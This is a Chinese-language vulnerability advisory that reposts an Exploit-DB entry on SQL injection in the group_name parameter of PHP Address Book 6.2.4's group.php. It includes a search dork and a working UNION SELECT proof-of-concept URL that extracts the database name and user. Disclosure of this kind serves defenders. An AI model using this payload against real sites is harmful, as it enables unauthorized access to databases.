PHP-addressbook group.php group_name参数SQL注入漏洞
信息来源:hiphop 发表日期:2013-02-01 16:53:00
PHP Address Book是基于Web的简单地址簿和号码簿。
PHP-addressbook 6.2.4版本的group.php脚本没有正确过滤group_name 参数内用户输入,可使攻击者在后端数据库内注入或操作SQL查询。
受影响系统:
sourceforge PHP Address Book 6.2.4
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!PHP-AddressBook 6.2.4 - (group.php) SQL Injection Vulnerability
EDB-ID: 15848 CVE: N/A OSVDB-ID: 70219
Author: hiphop Published: 2010-12-29 Verified: Verified
Exploit Code: Download Vulnerable App: Download
Rating
Overall:
#Exploit Title : PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date : 2010/12/29
#Found : by hiphop
#thanks :silly3r
proof of concept:
Condition: magic_quotes_gpc = off
http://server/group.php?group_name=1\'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9\'
解决办法:
厂商补丁:
sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://php-addressbook.sourceforge.net/download
参考信息:
http://osvdb.org/show/osvdb/70219